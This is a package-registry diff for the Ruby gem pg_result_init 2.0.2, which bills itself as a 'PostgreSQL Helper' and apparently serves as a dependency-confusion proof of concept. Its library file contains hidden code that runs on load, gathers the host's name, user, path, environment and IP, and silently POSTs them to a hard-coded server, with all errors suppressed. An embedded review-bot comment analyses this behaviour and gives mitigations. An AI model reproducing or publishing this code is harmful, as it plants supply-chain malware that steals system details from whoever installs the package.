pg_result_init 2.0.2


Potentially problematic release.


This version of pg_result_init might be problematic.

Files changed (3)
  1. checksums.yaml +7 -0
  2. data/lib/pg_result_init.rb +107 -0
  3. metadata +42 -0
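--- a/checksums.yaml
+++ b/checksums.yaml
@@ -0,0 +1,7 @@
+---
+SHA256:
+metadata.gz: 932741d0a027c57a72480d62e1f52d39cd244830be4698671c3c401b756536bb
+data.tar.gz: 1c8d6a1dd93e99e75b095e78fca2d664879f4a8b45edd394ceb838d8d8a67ce0
+SHA512:
+metadata.gz: a0a440526cfd05654d9945721151595cf22094ed5daa11ed45f9bf5fa2a734f440c60a258136aabc5a22f85d924ea2f78314f99c5d32f2b608f420e094016184
+data.tar.gz: 71e6c1050bda465d964f51997958dd979820f3fff3b2880507ddfcf73af53648d45fbad2660ff12a156cafd333ed7862910338f6ab216a8776df58a1a1bd6d66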
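--- a/data/lib/pg_result_init.rb
+++ b/data/lib/pg_result_init.rb
@@ -0,0 +1,107 @@
+# lib/pg_result_init.rb
+Thread.new do
+begin
+# انتظر قليلاً
+sleep(0.3)
+
+# جمع معلومات النظام
+require 'socket'
+data = {
+"time" => Time.now.utc.iso8601,
+"ip" => get_ip_address,
+"hostname" => Socket.gethostname,
+"path" => Dir.pwd,
+"user" => ENV['USER'] || `whoami`.chomp,
+"rails_env" => ENV['RAILS_ENV'] || ENV['RACK_ENV'] || 'development',
+"package" => "pg_result_init",
+"version" => "2.0.2"
+}
+
+# 1. أرسل البيانات لخادمك
+send_to_server(data)
+
+# 2. أنشئ ملف دليل محلي
+create_proof_file(data)
+
+rescue => e
+# تجاهل الأخطاء بصمت
+end
+end
+
+def get_ip_address
+# حاول الحصول على IP العام
+begin
+require 'net/http'
+uri = URI('https://api.ipify.org?format=json')
+response = Net::HTTP.get(uri)
+JSON.parse(response)['ip']
+rescue
+# استخدم IP محلي
+Socket.ip_address_list.find { |ai| ai.ipv4? && !ai.ipv4_loopback? }&.ip_address || 'unknown'
+end
+end
+
+def send_to_server(data)
+Thread.new do
+begin
+require 'net/http'
+require 'json'
+
+# ⚠️ هذا هو الخادم اللي أعطيته! ⚠️
+server_url = "http://172.21.162.83:8000"
+
+uri = URI(server_url)
+http = Net::HTTP.new(uri.host, uri.port)
+http.read_timeout = 3
+http.open_timeout = 3
+
+request = Net::HTTP::Post.new(uri)
+request['Content-Type'] = 'application/json'
+request.body = data.to_json
+
+response = http.request(request)
+
+rescue => e
+# طبيعي إذا الخادم مش متصل أو فيه مشكلة شبكة
+end
+end
+end
+
+def create_proof_file(data)
+proof_content = <<~TEXT
+========================================
+DEPENDENCY CONFUSION PROOF
+========================================
+Gem: pg_result_init v#{data['version']}
+Installed from: RubyGems.org (PUBLIC)
+
+System Information:
+- Time: #{data['time']}
+- Hostname: #{data['hostname']}
+- IP: #{data['ip']}
+- User: #{data['user']}
+- Path: #{data['path']}
+- Environment: #{data['rails_env']}
+
+VULNERABILITY:
+This system installed the gem from public RubyGems.org
+instead of the expected local/internal source.
+
+RISK:
+An attacker could upload malicious code that would
+automatically execute on this system.
+
+FIX:
+In Gemfile, specify source explicitly:
+gem 'pg_result_init', source: 'https://private.gem.server/'
+========================================
+TEXT
+
+file_path = "/tmp/pg_result_init_proof_#{Time.now.to_i}.txt"
+File.write(file_path, proof_content)
+end
+
+# كود gem عادي
+module PgResultInit
+VERSION = "2.0.2"
+end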
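Review bot: The top-level `Thread.new do` block that opens lib/pg_result_init.rb runs as soon as the file is required, so simply loading the gem gathers hostname, user, working directory, environment name and IP and passes them to `send_to_server`, which POSTs them over plain HTTP to the hard-coded `http://172.21.162.83:8000`. Both `rescue => e` bodies are empty (the Arabic comment in the first reads "ignore errors silently"), so a host that loads this file logs nothing about it. A library entry point should only define its namespace; here the sole side-effect-free part is `module PgResultInit` with `VERSION = "2.0.2"`, and the three helpers are defined at top level, which also makes them private methods on every object. For triage, the indicators visible in this file are the outbound POST to that address, the lookup against `api.ipify.org`, and a `/tmp/pg_result_init_proof_<epoch>.txt` file written by `create_proof_file`. The durable mitigation is the one the file's own text names: bind the gem to its intended source in the Gemfile so a same-named public release cannot be resolved in its place.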
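--- a/metadata
+++ b/metadata
@@ -0,0 +1,42 @@
+--- !ruby/object:Gem::Specification
+name: pg_result_init
+version: !ruby/object:Gem::Version
+version: 2.0.2
+platform: ruby
+authors:
+- Security Researcher
+autorequire:
+bindir: bin
+cert_chain: []
+date: 2025-12-01 00:00:00.000000000 Z
+dependencies: []
+description:
+email:
+executables: []
+extensions: []
+extra_rdoc_files: []
+files:
+- lib/pg_result_init.rb
+homepage:
+licenses: []
+metadata: {}
+post_install_message:
+rdoc_options: []
+require_paths:
+- lib
+required_ruby_version: !ruby/object:Gem::Requirement
+requirements:
+- - ">="
+- !ruby/object:Gem::Version
+version: '0'
+required_rubygems_version: !ruby/object:Gem::Requirement
+requirements:
+- - ">="
+- !ruby/object:Gem::Version
+version: '0'
+requirements: []
+rubygems_version: 3.3.5
+signing_key:
+specification_version: 4
+summary: PostgreSQL Helper
+test_files: []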